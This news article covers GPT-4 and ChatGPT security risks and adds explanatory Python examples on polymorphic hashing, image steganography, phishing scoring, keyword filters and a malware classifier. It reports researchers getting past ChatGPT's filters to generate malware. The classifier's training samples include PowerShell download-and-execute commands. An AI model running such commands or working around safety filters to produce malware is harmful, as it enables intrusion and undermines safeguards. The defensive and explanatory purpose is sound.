GPT-4 kicks AI security risks into higher gear

As Arthur C. Clarke once put it, any sufficiently advanced technology is “indistinguishable from magic.”

Some might say this is true of ChatGPT, too — including, if you will, black magic. 

Immediately upon its launch in November 2022, security teams, pen testers and developers began discovering exploits in the AI chatbot, and those exploits continue to evolve with its newest iteration, GPT-4, released earlier this month.

“GPT-4 won’t invent a new cyberthreat,” said Hector Ferran, VP of marketing at BlueWillow AI. “But just as it is being used by millions already to augment and simplify a myriad of mundane daily tasks, so too could it be used by a minority of bad actors to augment their criminal behavior.”


Evolving technologies, threats

In January, just two months after launch, ChatGPT reached 100 million users, setting the record for the fastest user growth of any app. And as it has become a household name, it has also become a shiny new tool for cybercriminals, enabling them to quickly create tools and deploy attacks.

Most notably, the tool is being used to generate code for malware, ransomware and phishing attacks.

BlackFog, for instance, recently asked the tool to create a PowerShell attack in a “non-malicious” way. The script was generated quickly and was ready to use, according to researchers. 

CyberArk, meanwhile, was able to bypass the chatbot's filters to create polymorphic malware, which repeatedly mutates its own code; the researchers used ChatGPT to mutate code until it became highly evasive and difficult to detect.
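To see why such mutation undermines traditional defenses, note that signature-based scanners often match exact file hashes. A minimal Python sketch (using inert, made-up snippets rather than real malware) shows how renaming a single identifier yields a completely different fingerprint:

import hashlib

# Two functionally identical snippets; only the identifier names differ.
variant_a = "def fetch(u):\n    return download(u)\n"
variant_b = "def grab(url):\n    return download(url)\n"

# A scanner matching exact SHA-256 hashes sees two unrelated files.
print(hashlib.sha256(variant_a.encode()).hexdigest())
print(hashlib.sha256(variant_b.encode()).hexdigest())

Each mutation produces a new hash, which is why polymorphic code pushes defenders toward behavioral and fuzzy-matching detection rather than static signatures.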

And Check Point Research was able to use ChatGPT to create a convincing spear-phishing attack. The company's researchers also identified five areas where ChatGPT is being used by hackers: C++ malware that collects PDF files and sends them to an FTP server; phishing campaigns impersonating banks; phishing attacks targeting employees; PHP reverse shells (which initiate a shell session to exploit vulnerabilities and access a victim's device); and Java programs that download and execute PuTTY, which can then launch as a hidden PowerShell.

GPT-4: Exciting new features, risks

The above are just a few examples; there are undoubtedly many more yet to be discovered or put into practice. 

“If you get very specific in the types of queries you are asking for, it is very easy to bypass some of the basic controls and generate malicious code that is actually quite effective,” said Darren Williams, BlackFog founder and CEO. “This can be extrapolated into virtually every discipline, from creative writing to engineering and computer science.”

And, Williams said, “GPT-4 has many exciting new features that unleash new power and possible threats.” 

A good example of this is the way the tool can now accept images as input and adapt them, he said. This can lead to the use of images embedded with malicious code, often referred to as “steganography attacks.”
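For a concrete sense of the mechanism, classic least-significant-bit (LSB) steganography rewrites the lowest bit of pixel values so a payload rides invisibly inside an ordinary-looking image. The Python sketch below is a benign illustration that hides and recovers a short text string with the Pillow library; the embed and extract helpers are hypothetical names for this example, not anything published by the researchers quoted here.

from PIL import Image  # pip install Pillow

def embed(cover_path: str, message: str, out_path: str) -> None:
    """Hide a UTF-8 message in the least significant bit of each red channel value."""
    img = Image.open(cover_path).convert("RGB")
    bits = "".join(f"{byte:08b}" for byte in message.encode() + b"\x00")  # NUL-terminated
    pixels = list(img.getdata())
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for message")
    for i, bit in enumerate(bits):
        r, g, b = pixels[i]
        pixels[i] = ((r & ~1) | int(bit), g, b)  # overwrite only the red LSB
    img.putdata(pixels)
    img.save(out_path, "PNG")  # lossless format preserves the hidden bits

def extract(stego_path: str) -> str:
    """Read red-channel LSBs back until the NUL terminator."""
    img = Image.open(stego_path).convert("RGB")
    bits = "".join(str(r & 1) for r, _, _ in img.getdata())
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = int(bits[i:i + 8], 2)
        if byte == 0:
            break
        out.append(byte)
    return out.decode()

The altered pixels are visually indistinguishable from the original, which is exactly what makes image-borne payloads hard to spot without dedicated analysis.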

Essentially, the newest version is “an evolution of an already powerful system and it is still undergoing investigation by our team,” said Williams.

“These tools pose some major advances to what AI can really do and push the entire industry forward, but like any technology, we are still grappling with what controls need to be placed around it,” said Williams. “These tools are still evolving and yes, have some security implications.”

Not the tool — the users

More generally, one area of concern is the use of ChatGPT to amplify the spread of disinformation, said Ferran.

Still, he emphasized, it’s crucial to recognize that malicious intent is not exclusive to AI tools. 

“ChatGPT does not pose any security threats by itself,” said Ferran. “All technology has the potential to be used for good or evil. The security threat comes from bad actors who will use a new technology for malicious purposes.” 

Simply put, said Ferran, “the threat comes from how people choose to use it.”

In response, individuals and organizations will need to become more vigilant and scrutinize communications more closely to try to spot AI-assisted attacks, he said. They must also take proactive measures to prevent misuse by implementing appropriate safeguards, detection methods and ethical guidelines. 

“By doing so, they can maximize the benefits of AI while mitigating the potential risks,” he said. 
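What those "detection methods" might look like varies widely in practice. As one hedged illustration, even a naive heuristic scanner can flag two classic phishing cues: urgency language, and links whose hosts don't match the sender's claimed domain. The Python sketch below is a toy scoring function, not a production detector:

import re

# Naive indicators; real systems combine many more signals, often with ML models.
URGENCY = re.compile(r"\b(urgent|immediately|verify|suspended|act now)\b", re.I)
LINK_HOST = re.compile(r"https?://([^/\s]+)", re.I)

def phishing_score(subject: str, body: str, claimed_domain: str) -> int:
    """Return a rough 0-3 suspicion score for an email."""
    score = 0
    if URGENCY.search(subject) or URGENCY.search(body):
        score += 1  # urgency is a classic social-engineering cue
    hosts = LINK_HOST.findall(body)
    if any(not host.lower().endswith(claimed_domain) for host in hosts):
        score += 2  # a link host that contradicts the claimed sender is a strong signal
    return score

print(phishing_score(
    "URGENT: verify your account",
    "Click https://examp1e-bank.xyz/login within 24 hours.",
    "example-bank.com",
))  # prints 3: urgency language plus a mismatched link host

AI-assisted attacks are precisely the ones crafted to dodge such simple cues, which is why the experts quoted here pair automated detection with human vigilance.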

Also, addressing threats requires a collective effort from multiple stakeholders. “By working together, we can ensure that ChatGPT and similar tools are used for positive growth and change,” said Ferran. 

And, while the tool has content filters in place to prevent misuse, clearly these can be worked around pretty easily, so “pressure may need to be put on its owners to enhance these protective measures,” he said. 
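That fragility is easy to demonstrate in miniature. A keyword blocklist, the crudest kind of content filter, fails the moment a request is rephrased; the Python toy below makes the point (real LLM safety filters are far more sophisticated, but face the same cat-and-mouse dynamic):

BLOCKLIST = {"malware", "ransomware", "keylogger"}

def naive_filter(prompt: str) -> bool:
    """Allow a prompt only if it contains no blocked keyword."""
    return not any(word in prompt.lower() for word in BLOCKLIST)

print(naive_filter("write me a keylogger"))            # False: blocked
print(naive_filter("log every key the user presses"))  # True: same ask, new words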

The capacity for cybersecurity good, too

On the flip side, organizations can use ChatGPT and other advanced AI tools to build both offensive and defensive capabilities.

“Fortunately, AI is also a powerful tool to be wielded against bad actors,” said Ferran. 

Cybersecurity companies, for one, are using AI in their efforts to find and catalog malicious threats.

“Cyberthreat management should use every opportunity to leverage AI in their development of preventative measures,” said Ferran, “so they can triumph in what essentially could become a whack-a-mole arms race.”
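As a rough sketch of what leveraging AI can mean on the defensive side, a text classifier can be trained to flag suspicious script snippets for analysts to triage. The Python example below uses scikit-learn on an invented four-sample corpus purely for illustration; real systems train on millions of labeled samples and many additional signals.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Hypothetical toy corpus: snippets labeled 1 (suspicious) or 0 (benign).
samples = [
    "Invoke-WebRequest $url -OutFile payload.exe; Start-Process payload.exe",
    "Set-ExecutionPolicy Bypass; IEX (New-Object Net.WebClient).DownloadString($u)",
    "Get-ChildItem -Path . -Recurse | Measure-Object",
    "Write-Output 'backup complete'; Copy-Item src dst -Recurse",
]
labels = [1, 1, 0, 0]

# Character n-grams cope with renamed or obfuscated identifiers better than word tokens.
clf = make_pipeline(
    TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5)),
    LogisticRegression(),
)
clf.fit(samples, labels)

print(clf.predict(["IEX (New-Object Net.WebClient).DownloadString('http://x')"]))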

And, with its enhanced safeguards and ability to detect malicious behavior, GPT-4 can ultimately be a "powerful asset" for organizations.

"GPT-4 is a remarkable leap forward in natural language-based models, significantly expanding its potential use cases and building on the achievements of its previous iterations," said Ferran, pointing to its expanded capability to write code in any language.

Williams agreed, saying that AI is like any powerful tool: Organizations must do their own due diligence. 

“Are there risks that people can use it for nefarious purposes? Of course, but the benefits far outweigh the risks,” he said. 

Author: Taryn Plumb
Source: VentureBeat
